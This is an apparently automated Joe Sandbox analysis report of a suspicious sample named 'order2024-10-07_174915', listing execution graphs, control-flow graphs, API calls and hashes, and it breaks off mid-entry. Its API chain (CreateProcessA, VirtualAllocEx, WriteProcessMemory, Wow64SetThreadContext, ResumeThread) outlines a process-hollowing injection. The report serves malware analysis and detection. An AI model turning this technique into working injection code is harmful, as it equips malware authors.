                                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                Imagebase:0x7ff7fb730000
                                                File size:496'640 bytes
                                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                Has elevated privileges:true
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Disassembly

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:10.4%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:172
                                                  Total number of Limit Nodes:6
                                                  execution_graph 35006 7aa60ab 35007 7aa61df 35006->35007 35012 7aa730a 35007->35012 35028 7aa737e 35007->35028 35045 7aa7318 35007->35045 35008 7aa614e 35013 7aa730c 35012->35013 35014 7aa733a 35013->35014 35061 7aa79e8 35013->35061 35066 7aa79b6 35013->35066 35071 7aa78b2 35013->35071 35076 7aa7a3d 35013->35076 35081 7aa7e3f 35013->35081 35086 7aa7eff 35013->35086 35090 7aa77db 35013->35090 35096 7aa8087 35013->35096 35101 7aa7c46 35013->35101 35106 7aa7866 35013->35106 35111 7aa7b46 35013->35111 35116 7aa792c 35013->35116 35121 7aa774e 35013->35121 35014->35008 35029 7aa730c 35028->35029 35030 7aa7381 35028->35030 35031 7aa733a 35029->35031 35032 7aa79e8 2 API calls 35029->35032 35033 7aa774e 2 API calls 35029->35033 35034 7aa792c 2 API calls 35029->35034 35035 7aa7b46 2 API calls 35029->35035 35036 7aa7866 2 API calls 35029->35036 35037 7aa7c46 2 API calls 35029->35037 35038 7aa8087 2 API calls 35029->35038 35039 7aa77db 2 API calls 35029->35039 35040 7aa7eff 2 API calls 35029->35040 35041 7aa7e3f 2 API calls 35029->35041 35042 7aa7a3d 2 API calls 35029->35042 35043 7aa78b2 2 API calls 35029->35043 35044 7aa79b6 2 API calls 35029->35044 35031->35008 35032->35031 35033->35031 35034->35031 35035->35031 35036->35031 35037->35031 35038->35031 35039->35031 35040->35031 35041->35031 35042->35031 35043->35031 35044->35031 35046 7aa7332 35045->35046 35047 7aa733a 35046->35047 35048 7aa79e8 2 API calls 35046->35048 35049 7aa774e 2 API calls 35046->35049 35050 7aa792c 2 API calls 35046->35050 35051 7aa7b46 2 API calls 35046->35051 35052 7aa7866 2 API calls 35046->35052 35053 7aa7c46 2 API calls 35046->35053 35054 7aa8087 2 API calls 35046->35054 35055 7aa77db 2 API calls 35046->35055 35056 7aa7eff 2 API calls 35046->35056 35057 7aa7e3f 2 API calls 35046->35057 35058 7aa7a3d 2 API calls 35046->35058 35059 7aa78b2 2 API calls 35046->35059 35060 7aa79b6 2 API calls 35046->35060 35047->35008 35048->35047 35049->35047 35050->35047 35051->35047 35052->35047 35053->35047 35054->35047 35055->35047 35056->35047 35057->35047 35058->35047 35059->35047 35060->35047 35062 7aa787d 35061->35062 35063 7aa7892 35062->35063 35125 7aa57a8 35062->35125 35129 7aa57a0 35062->35129 35063->35014 35067 7aa808e 35066->35067 35068 7aa80b0 35067->35068 35133 7aa5ad8 35067->35133 35137 7aa5ae0 35067->35137 35072 7aa78c2 35071->35072 35141 7aa59e8 35072->35141 35145 7aa59f0 35072->35145 35073 7aa7ea7 35073->35014 35077 7aa7964 35076->35077 35078 7aa7943 35076->35078 35077->35014 35079 7aa59e8 WriteProcessMemory 35078->35079 35080 7aa59f0 WriteProcessMemory 35078->35080 35079->35077 35080->35077 35082 7aa7e45 35081->35082 35084 7aa59e8 WriteProcessMemory 35082->35084 35085 7aa59f0 WriteProcessMemory 35082->35085 35083 7aa7e67 35084->35083 35085->35083 35149 7aa592b 35086->35149 35153 7aa5930 35086->35153 35087 7aa7f1d 35091 7aa7777 35090->35091 35092 7aa77df 35090->35092 35157 7aa5c78 35091->35157 35161 7aa5c6c 35091->35161 35092->35014 35097 7aa808d 35096->35097 35099 7aa5ad8 ReadProcessMemory 35097->35099 35100 7aa5ae0 ReadProcessMemory 35097->35100 35098 7aa80b0 35099->35098 35100->35098 35165 7aa5858 35101->35165 35169 7aa5853 35101->35169 35102 7aa7a7a 35102->35101 35103 7aa8148 35102->35103 35107 7aa786c 35106->35107 35109 7aa57a8 ResumeThread 35107->35109 35110 7aa57a0 ResumeThread 35107->35110 35108 7aa7892 35108->35014 35109->35108 35110->35108 35112 7aa7fcf 35111->35112 35114 7aa5858 Wow64SetThreadContext 35112->35114 35115 7aa5853 Wow64SetThreadContext 35112->35115 35113 7aa7fea 35114->35113 35115->35113 35117 7aa7932 35116->35117 35119 7aa59e8 WriteProcessMemory 35117->35119 35120 7aa59f0 WriteProcessMemory 35117->35120 35118 7aa7964 35118->35014 35119->35118 35120->35118 35122 7aa7799 35121->35122 35123 7aa5c78 CreateProcessA 35121->35123 35124 7aa5c6c CreateProcessA 35121->35124 35122->35014 35123->35122 35124->35122 35126 7aa57e8 ResumeThread 35125->35126 35128 7aa5819 35126->35128 35128->35063 35130 7aa57a8 ResumeThread 35129->35130 35132 7aa5819 35130->35132 35132->35063 35134 7aa5ae0 ReadProcessMemory 35133->35134 35136 7aa5b6f 35134->35136 35136->35068 35138 7aa5b2b ReadProcessMemory 35137->35138 35140 7aa5b6f 35138->35140 35140->35068 35142 7aa59f0 WriteProcessMemory 35141->35142 35144 7aa5a8f 35142->35144 35144->35073 35146 7aa5a38 WriteProcessMemory 35145->35146 35148 7aa5a8f 35146->35148 35148->35073 35150 7aa5930 VirtualAllocEx 35149->35150 35152 7aa59ad 35150->35152 35152->35087 35154 7aa5970 VirtualAllocEx 35153->35154 35156 7aa59ad 35154->35156 35156->35087 35158 7aa5d01 35157->35158 35158->35158 35159 7aa5e66 CreateProcessA 35158->35159 35160 7aa5ec3 35159->35160 35162 7aa5c78 35161->35162 35162->35162 35163 7aa5e66 CreateProcessA 35162->35163 35164 7aa5ec3 35163->35164 35166 7aa589d Wow64SetThreadContext 35165->35166 35168 7aa58e5 35166->35168 35168->35102 35170 7aa5858 Wow64SetThreadContext 35169->35170 35172 7aa58e5 35170->35172 35172->35102 35173 165cfe0 35174 165d026 GetCurrentProcess 35173->35174 35176 165d071 35174->35176 35177 165d078 GetCurrentThread 35174->35177 35176->35177 35178 165d0b5 GetCurrentProcess 35177->35178 35179 165d0ae 35177->35179 35180 165d0eb 35178->35180 35179->35178 35181 165d113 GetCurrentThreadId 35180->35181 35182 165d144 35181->35182 35204 165d630 DuplicateHandle 35205 165d6c6 35204->35205 35213 165ac50 35217 165ad38 35213->35217 35222 165ad48 35213->35222 35214 165ac5f 35218 165ad7c 35217->35218 35219 165ad59 35217->35219 35218->35214 35219->35218 35220 165af80 GetModuleHandleW 35219->35220 35221 165afad 35220->35221 35221->35214 35223 165ad7c 35222->35223 35224 165ad59 35222->35224 35223->35214 35224->35223 35225 165af80 GetModuleHandleW 35224->35225 35226 165afad 35225->35226 35226->35214 35206 7aa8640 35207 7aa87cb 35206->35207 35209 7aa8666 35206->35209 35209->35207 35210 7aa6aa4 35209->35210 35211 7aa88c0 PostMessageW 35210->35211 35212 7aa892c 35211->35212 35212->35209 35183 1654668 35184 165467a 35183->35184 35185 1654686 35184->35185 35187 1654778 35184->35187 35188 165479d 35187->35188 35192 1654878 35188->35192 35196 1654888 35188->35196 35193 16548af 35192->35193 35194 165498c 35193->35194 35200 16544b0 35193->35200 35197 16548af 35196->35197 35198 165498c 35197->35198 35199 16544b0 CreateActCtxA 35197->35199 35199->35198 35201 1655918 CreateActCtxA 35200->35201 35203 16559db 35201->35203

                                                  Executed Functions

                                                  Function 07AA90D0 Relevance: .4, Instructions: 400COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1286784900.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7aa0000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4f61b873236b15fc8d9b1aebba8c5bcedf182b6ada2845b7512e6d7a0a90539d
                                                  • Instruction ID: 32b6debc951e94c6f74b6e70a227f0e1b83eedd62ef2bb50c50ae0ecc8ecbd19
                                                  • Opcode Fuzzy Hash: 4f61b873236b15fc8d9b1aebba8c5bcedf182b6ada2845b7512e6d7a0a90539d
                                                  • Instruction Fuzzy Hash: 7EE1EAB0B01605AFEB29DBB5C850BAFB7FAAFC9600F14446DD166DB290CB34E801CB51
                                                  Function 05907AA8 Relevance: 7.6, Strings: 6, Instructions: 144COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 294 5907aa8-5907ac0 295 5907ae2-5907b07 294->295 298 5907b09 295->298 299 5907b0c-5907b16 295->299 298->299 300 5907b18-5907b1d 299->300 301 5907b1f-5907b22 299->301 302 5907b25-5907b37 300->302 301->302 304 5907ac2-5907ac5 302->304 305 5907ac7 304->305 306 5907ace-5907ae0 304->306 305->295 305->306 307 5907b64-5907b66 305->307 308 5907b46-5907b62 305->308 309 5907c47-5907c4d 305->309 310 5907b39-5907b41 305->310 311 5907be9-5907c02 305->311 312 5907baa-5907bc7 305->312 313 5907bdb-5907be4 305->313 306->304 315 5907b84 307->315 316 5907b68-5907b6e 307->316 308->307 317 5907c51-5907c5d 309->317 318 5907c4f 309->318 310->304 319 5907c08-5907c18 311->319 320 5907c8a-5907c8f 311->320 326 5907bd1-5907bd6 312->326 313->304 327 5907b86-5907b95 315->327 323 5907b70-5907b72 316->323 324 5907b74-5907b80 316->324 325 5907c5f-5907c6a 317->325 318->325 319->320 321 5907c1a-5907c2b 319->321 321->320 328 5907c2d-5907c34 321->328 329 5907b82 323->329 324->329 338 5907c82-5907c89 325->338 339 5907c6c-5907c72 325->339 326->304 335 5907ba0-5907ba5 327->335 332 5907c40-5907c45 328->332 333 5907c36 328->333 329->327 332->309 337 5907c3b 332->337 333->337 335->304 337->304 340 5907c74 339->340 341 5907c76-5907c78 339->341 340->338 341->338
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1285227499.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5900000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LRq$LRq$$q$$q$$q$$q
                                                  • API String ID: 0-1198634162
                                                  • Opcode ID: 516b86588ccf810f620566e29fd72048116b0d1ad19bacb9ed896a505a9f7e28
                                                  • Instruction ID: fe435fac43e8065d09e76ddb6477d5e4630986385e9e426209135d44ca6cbd92
                                                  • Opcode Fuzzy Hash: 516b86588ccf810f620566e29fd72048116b0d1ad19bacb9ed896a505a9f7e28
                                                  • Instruction Fuzzy Hash: CC51A031B04229DFDB14DB998805B7AB7BBFB84721F149C6AE1069B2C1DB749D41C790
                                                  Function 0165CFD0 Relevance: 6.1, APIs: 4, Instructions: 131threadCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 342 165cfd0-165d06f GetCurrentProcess 346 165d071-165d077 342->346 347 165d078-165d0ac GetCurrentThread 342->347 346->347 348 165d0b5-165d0e9 GetCurrentProcess 347->348 349 165d0ae-165d0b4 347->349 350 165d0f2-165d10d call 165d5b9 348->350 351 165d0eb-165d0f1 348->351 349->348 355 165d113-165d142 GetCurrentThreadId 350->355 351->350 356 165d144-165d14a 355->356 357 165d14b-165d1ad 355->357 356->357
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 0165D05E
                                                  • GetCurrentThread.KERNEL32 ref: 0165D09B
                                                  • GetCurrentProcess.KERNEL32 ref: 0165D0D8
                                                  • GetCurrentThreadId.KERNEL32 ref: 0165D131
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1276743809.0000000001650000.00000040.00000800.00020000.00000000.sdmp, Offset: 01650000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1650000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID:
                                                  • API String ID: 2063062207-0
                                                  • Opcode ID: 44828317f116d0ae95341e002c1deadad2f6282c0a823ab9e19e4fda87ab3a8e
                                                  • Instruction ID: c049476934fc50d8d8b4a287a38bb7dea22a483af7d520c0b61dbd39393728e2
                                                  • Opcode Fuzzy Hash: 44828317f116d0ae95341e002c1deadad2f6282c0a823ab9e19e4fda87ab3a8e
                                                  • Instruction Fuzzy Hash: 0F5155B4900349CFEB69CFA9D948B9EBBF1EF48304F208459D409AB3A1D7359945CB26
                                                  Function 0165CFE0 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 364 165cfe0-165d06f GetCurrentProcess 368 165d071-165d077 364->368 369 165d078-165d0ac GetCurrentThread 364->369 368->369 370 165d0b5-165d0e9 GetCurrentProcess 369->370 371 165d0ae-165d0b4 369->371 372 165d0f2-165d10d call 165d5b9 370->372 373 165d0eb-165d0f1 370->373 371->370 377 165d113-165d142 GetCurrentThreadId 372->377 373->372 378 165d144-165d14a 377->378 379 165d14b-165d1ad 377->379 378->379
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 0165D05E
                                                  • GetCurrentThread.KERNEL32 ref: 0165D09B
                                                  • GetCurrentProcess.KERNEL32 ref: 0165D0D8
                                                  • GetCurrentThreadId.KERNEL32 ref: 0165D131
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1276743809.0000000001650000.00000040.00000800.00020000.00000000.sdmp, Offset: 01650000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1650000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID:
                                                  • API String ID: 2063062207-0
                                                  • Opcode ID: dd0f6b9ce63fda87c19db4231439fca75b21083b4aacbb732642a5ee3dc6568d
                                                  • Instruction ID: 4dfb02fe2537462a8ba41757ecd00956769fbd3b72ae89920270d902afdb8279
                                                  • Opcode Fuzzy Hash: dd0f6b9ce63fda87c19db4231439fca75b21083b4aacbb732642a5ee3dc6568d
                                                  • Instruction Fuzzy Hash: 415158B0D00309CFEB68CFAAD948B9EBBF1EF48304F208459D409A7391D7355945CB65
                                                  Function 05907A98 Relevance: 3.9, Strings: 3, Instructions: 130COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 459 5907a98-5907ac0 461 5907ae2-5907b07 459->461 464 5907b09 461->464 465 5907b0c-5907b16 461->465 464->465 466 5907b18-5907b1d 465->466 467 5907b1f-5907b22 465->467 468 5907b25-5907b37 466->468 467->468 470 5907ac2-5907ac5 468->470 471 5907ac7 470->471 472 5907ace-5907ae0 470->472 471->461 471->472 473 5907b64-5907b66 471->473 474 5907b46-5907b62 471->474 475 5907c47-5907c4d 471->475 476 5907b39-5907b41 471->476 477 5907be9-5907c02 471->477 478 5907baa-5907bc7 471->478 479 5907bdb-5907be4 471->479 472->470 481 5907b84 473->481 482 5907b68-5907b6e 473->482 474->473 483 5907c51-5907c5d 475->483 484 5907c4f 475->484 476->470 485 5907c08-5907c18 477->485 486 5907c8a-5907c8f 477->486 492 5907bd1-5907bd6 478->492 479->470 493 5907b86-5907b95 481->493 489 5907b70-5907b72 482->489 490 5907b74-5907b80 482->490 491 5907c5f-5907c6a 483->491 484->491 485->486 487 5907c1a-5907c2b 485->487 487->486 494 5907c2d-5907c34 487->494 495 5907b82 489->495 490->495 504 5907c82-5907c89 491->504 505 5907c6c-5907c72 491->505 492->470 501 5907ba0-5907ba5 493->501 498 5907c40-5907c45 494->498 499 5907c36 494->499 495->493 498->475 503 5907c3b 498->503 499->503 501->470 503->470 506 5907c74 505->506 507 5907c76-5907c78 505->507 506->504 507->504
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1285227499.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5900000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LRq$$q$$q
                                                  • API String ID: 0-167464460
                                                  • Opcode ID: 6f359ce25bd6fae9fd2f57ddb5c9294f01bec56a532193242c5864fbd5216816
                                                  • Instruction ID: 471a34262699f77a1a99775f14e2adc17fdd90c37a365fe21d1882050b3b045b
                                                  • Opcode Fuzzy Hash: 6f359ce25bd6fae9fd2f57ddb5c9294f01bec56a532193242c5864fbd5216816
                                                  • Instruction Fuzzy Hash: C841C431B04225EFDB14DF99C805B7ABBBAFF44721F149C6AE101AB2C2D7749941CB51
                                                  Function 0590E970 Relevance: 2.7, Strings: 2, Instructions: 177COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 530 590e970-590e993 531 590e995 530->531 532 590e99a-590ead2 call 590e948 530->532 531->532 549 590ea31-590ea32 532->549 550 590e9e5-590e9ea 532->550 549->550 552 590e9f0-590e9f1 550->552 553 590eaa3-590eadb 550->553 552->553 555 590ea68-590eb87 553->555 556 590eadd-590eb50 553->556 566 590eb52 call 7aa023b 556->566 567 590eb52 call 7aa04a8 556->567 568 590eb52 call 7aa02b8 556->568 569 590eb52 call 7aa025e 556->569 570 590eb52 call 7aa001f 556->570 571 590eb52 call 7aa0583 556->571 572 590eb52 call 7aa0040 556->572 573 590eb52 call 7aa0211 556->573 574 590eb52 call 7aa00d7 556->574 575 590eb52 call 7aa0834 556->575 565 590eb58-590eb62 566->565 567->565 568->565 569->565 570->565 571->565 572->565 573->565 574->565 575->565
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1285227499.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5900000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Teq$Teq
                                                  • API String ID: 0-2938103587
                                                  • Opcode ID: e508fc552407b8b0dca15dcea5fc4e19d5c85905bc7e370d8b7a0569ba2dbd70
                                                  • Instruction ID: 3c593573629deef712a2f8c41db93fa3399ed0cb6dc6748a1bc155ada17ba5af
                                                  • Opcode Fuzzy Hash: e508fc552407b8b0dca15dcea5fc4e19d5c85905bc7e370d8b7a0569ba2dbd70
                                                  • Instruction Fuzzy Hash: D161C474E05218CFDF18CFAAC984AEDBBFABF89300F14982AD519AB395D7305945CB50
                                                  Function 07AA5C6C Relevance: 1.8, APIs: 1, Instructions: 252processCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 576 7aa5c6c-7aa5d0d 579 7aa5d0f-7aa5d19 576->579 580 7aa5d46-7aa5d66 576->580 579->580 581 7aa5d1b-7aa5d1d 579->581 585 7aa5d68-7aa5d72 580->585 586 7aa5d9f-7aa5dce 580->586 583 7aa5d1f-7aa5d29 581->583 584 7aa5d40-7aa5d43 581->584 587 7aa5d2b 583->587 588 7aa5d2d-7aa5d3c 583->588 584->580 585->586 589 7aa5d74-7aa5d76 585->589 596 7aa5dd0-7aa5dda 586->596 597 7aa5e07-7aa5ec1 CreateProcessA 586->597 587->588 588->588 590 7aa5d3e 588->590 591 7aa5d78-7aa5d82 589->591 592 7aa5d99-7aa5d9c 589->592 590->584 594 7aa5d86-7aa5d95 591->594 595 7aa5d84 591->595 592->586 594->594 598 7aa5d97 594->598 595->594 596->597 599 7aa5ddc-7aa5dde 596->599 608 7aa5eca-7aa5f50 597->608 609 7aa5ec3-7aa5ec9 597->609 598->592 601 7aa5de0-7aa5dea 599->601 602 7aa5e01-7aa5e04 599->602 603 7aa5dee-7aa5dfd 601->603 604 7aa5dec 601->604 602->597 603->603 605 7aa5dff 603->605 604->603 605->602 619 7aa5f52-7aa5f56 608->619 620 7aa5f60-7aa5f64 608->620 609->608 619->620 621 7aa5f58 619->621 622 7aa5f66-7aa5f6a 620->622 623 7aa5f74-7aa5f78 620->623 621->620 622->623 624 7aa5f6c 622->624 625 7aa5f7a-7aa5f7e 623->625 626 7aa5f88-7aa5f8c 623->626 624->623 625->626 627 7aa5f80 625->627 628 7aa5f9e-7aa5fa5 626->628 629 7aa5f8e-7aa5f94 626->629 627->626 630 7aa5fbc 628->630 631 7aa5fa7-7aa5fb6 628->631 629->628 633 7aa5fbd 630->633 631->630 633->633
                                                  APIs
                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 07AA5EAE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1286784900.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7aa0000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID:
                                                  • API String ID: 963392458-0
                                                  • Opcode ID: 304ea0a98e3830ac911226bd71d5d50ec0a1e317a0dd91ff9ce0aaa146a07d7b
                                                  • Instruction ID: f88dbb5c57e98b3ed10cdf3d7c917c3b8877d9d02b6dd5d6ff8db5d8813903c1
                                                  • Opcode Fuzzy Hash: 304ea0a98e3830ac911226bd71d5d50ec0a1e317a0dd91ff9ce0aaa146a07d7b
                                                  • Instruction Fuzzy Hash: 88A159B1D0121ADFEB24CF69CC44BEDBBB2BF44310F148169E828A7240DB759995CF95
                                                  Function 07AA5C78 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 634 7aa5c78-7aa5d0d 636 7aa5d0f-7aa5d19 634->636 637 7aa5d46-7aa5d66 634->637 636->637 638 7aa5d1b-7aa5d1d 636->638 642 7aa5d68-7aa5d72 637->642 643 7aa5d9f-7aa5dce 637->643 640 7aa5d1f-7aa5d29 638->640 641 7aa5d40-7aa5d43 638->641 644 7aa5d2b 640->644 645 7aa5d2d-7aa5d3c 640->645 641->637 642->643 646 7aa5d74-7aa5d76 642->646 653 7aa5dd0-7aa5dda 643->653 654 7aa5e07-7aa5ec1 CreateProcessA 643->654 644->645 645->645 647 7aa5d3e 645->647 648 7aa5d78-7aa5d82 646->648 649 7aa5d99-7aa5d9c 646->649 647->641 651 7aa5d86-7aa5d95 648->651 652 7aa5d84 648->652 649->643 651->651 655 7aa5d97 651->655 652->651 653->654 656 7aa5ddc-7aa5dde 653->656 665 7aa5eca-7aa5f50 654->665 666 7aa5ec3-7aa5ec9 654->666 655->649 658 7aa5de0-7aa5dea 656->658 659 7aa5e01-7aa5e04 656->659 660 7aa5dee-7aa5dfd 658->660 661 7aa5dec 658->661 659->654 660->660 662 7aa5dff 660->662 661->660 662->659 676 7aa5f52-7aa5f56 665->676 677 7aa5f60-7aa5f64 665->677 666->665 676->677 678 7aa5f58 676->678 679 7aa5f66-7aa5f6a 677->679 680 7aa5f74-7aa5f78 677->680 678->677 679->680 681 7aa5f6c 679->681 682 7aa5f7a-7aa5f7e 680->682 683 7aa5f88-7aa5f8c 680->683 681->680 682->683 684 7aa5f80 682->684 685 7aa5f9e-7aa5fa5 683->685 686 7aa5f8e-7aa5f94 683->686 684->683 687 7aa5fbc 685->687 688 7aa5fa7-7aa5fb6 685->688 686->685 690 7aa5fbd 687->690 688->687 690->690
                                                  APIs
                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 07AA5EAE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1286784900.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7aa0000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID:
                                                  • API String ID: 963392458-0
                                                  • Opcode ID: 6f8d1cda4940aa6e755df0271c537b607c441c25303f4e37df0ee41a7b17de46
                                                  • Instruction ID: 52c5be20222452590d465fc12c248c6d948fa6b991ba79518a9a92e5664e72be
                                                  • Opcode Fuzzy Hash: 6f8d1cda4940aa6e755df0271c537b607c441c25303f4e37df0ee41a7b17de46
                                                  • Instruction Fuzzy Hash: D59159B1D0031ADFEB24CF69C844BADBBB2BF48314F148169E828A7240DB759991CF95
                                                  Function 0165AD48 Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 691 165ad48-165ad57 692 165ad83-165ad87 691->692 693 165ad59-165ad66 call 165a06c 691->693 694 165ad89-165ad93 692->694 695 165ad9b-165addc 692->695 700 165ad7c 693->700 701 165ad68 693->701 694->695 702 165adde-165ade6 695->702 703 165ade9-165adf7 695->703 700->692 746 165ad6e call 165afd1 701->746 747 165ad6e call 165afe0 701->747 702->703 704 165adf9-165adfe 703->704 705 165ae1b-165ae1d 703->705 709 165ae00-165ae07 call 165a078 704->709 710 165ae09 704->710 708 165ae20-165ae27 705->708 706 165ad74-165ad76 706->700 707 165aeb8-165af78 706->707 741 165af80-165afab GetModuleHandleW 707->741 742 165af7a-165af7d 707->742 712 165ae34-165ae3b 708->712 713 165ae29-165ae31 708->713 711 165ae0b-165ae19 709->711 710->711 711->708 715 165ae3d-165ae45 712->715 716 165ae48-165ae51 call 165a088 712->716 713->712 715->716 722 165ae53-165ae5b 716->722 723 165ae5e-165ae63 716->723 722->723 724 165ae65-165ae6c 723->724 725 165ae81-165ae85 723->725 724->725 727 165ae6e-165ae7e call 165a098 call 165a0a8 724->727 728 165ae8b-165ae8e 725->728 727->725 731 165aeb1-165aeb7 728->731 732 165ae90-165aeae 728->732 732->731 743 165afb4-165afc8 741->743 744 165afad-165afb3 741->744 742->741 744->743 746->706 747->706
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0165AF9E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1276743809.0000000001650000.00000040.00000800.00020000.00000000.sdmp, Offset: 01650000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1650000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: 4868ffe263755ef842bee816f9806002b844716b89a636f5569029289ad2a596
                                                  • Instruction ID: 7f2cf9f56627a4a501b42830e80cda0b5ab5fd303a06e259b9a41bc998f2f588
                                                  • Opcode Fuzzy Hash: 4868ffe263755ef842bee816f9806002b844716b89a636f5569029289ad2a596
                                                  • Instruction Fuzzy Hash: 10714870A00B058FE765DF6AD84475ABBF2FF88204F008A2ED94AD7B50D735E849CB91
                                                  Function 0165590C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 748 165590c-1655913 749 165591c-16559d9 CreateActCtxA 748->749 751 16559e2-1655a3c 749->751 752 16559db-16559e1 749->752 759 1655a3e-1655a41 751->759 760 1655a4b-1655a4f 751->760 752->751 759->760 761 1655a51-1655a5d 760->761 762 1655a60 760->762 761->762 764 1655a61 762->764 764->764
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 016559C9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1276743809.0000000001650000.00000040.00000800.00020000.00000000.sdmp, Offset: 01650000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1650000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: e636a03b0630d89685c58584c27152a9703db77a34739979bb0bfcf75403e02b
                                                  • Instruction ID: 32478f77fad6d8d844baa26962e6b4bd2e7b593b11ee78f25ae40b8d87f361e5
                                                  • Opcode Fuzzy Hash: e636a03b0630d89685c58584c27152a9703db77a34739979bb0bfcf75403e02b
                                                  • Instruction Fuzzy Hash: A941D074C00719CFEB24CFAAC9847CDBBB1BF49304F20806AD809AB251DB75694ACF91
                                                  Function 016544B0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 765 16544b0-16559d9 CreateActCtxA 768 16559e2-1655a3c 765->768 769 16559db-16559e1 765->769 776 1655a3e-1655a41 768->776 777 1655a4b-1655a4f 768->777 769->768 776->777 778 1655a51-1655a5d 777->778 779 1655a60 777->779 778->779 781 1655a61 779->781 781->781
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 016559C9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1276743809.0000000001650000.00000040.00000800.00020000.00000000.sdmp, Offset: 01650000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1650000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: bf2cbf2d5d11824937f2ad2fd2422ded7d21201734e3d21b158c47a20dd889cf
                                                  • Instruction ID: f61dc267c3d9ad4de77dce1eaf046b991ea3e4ddc991811bad6d156ec05968da
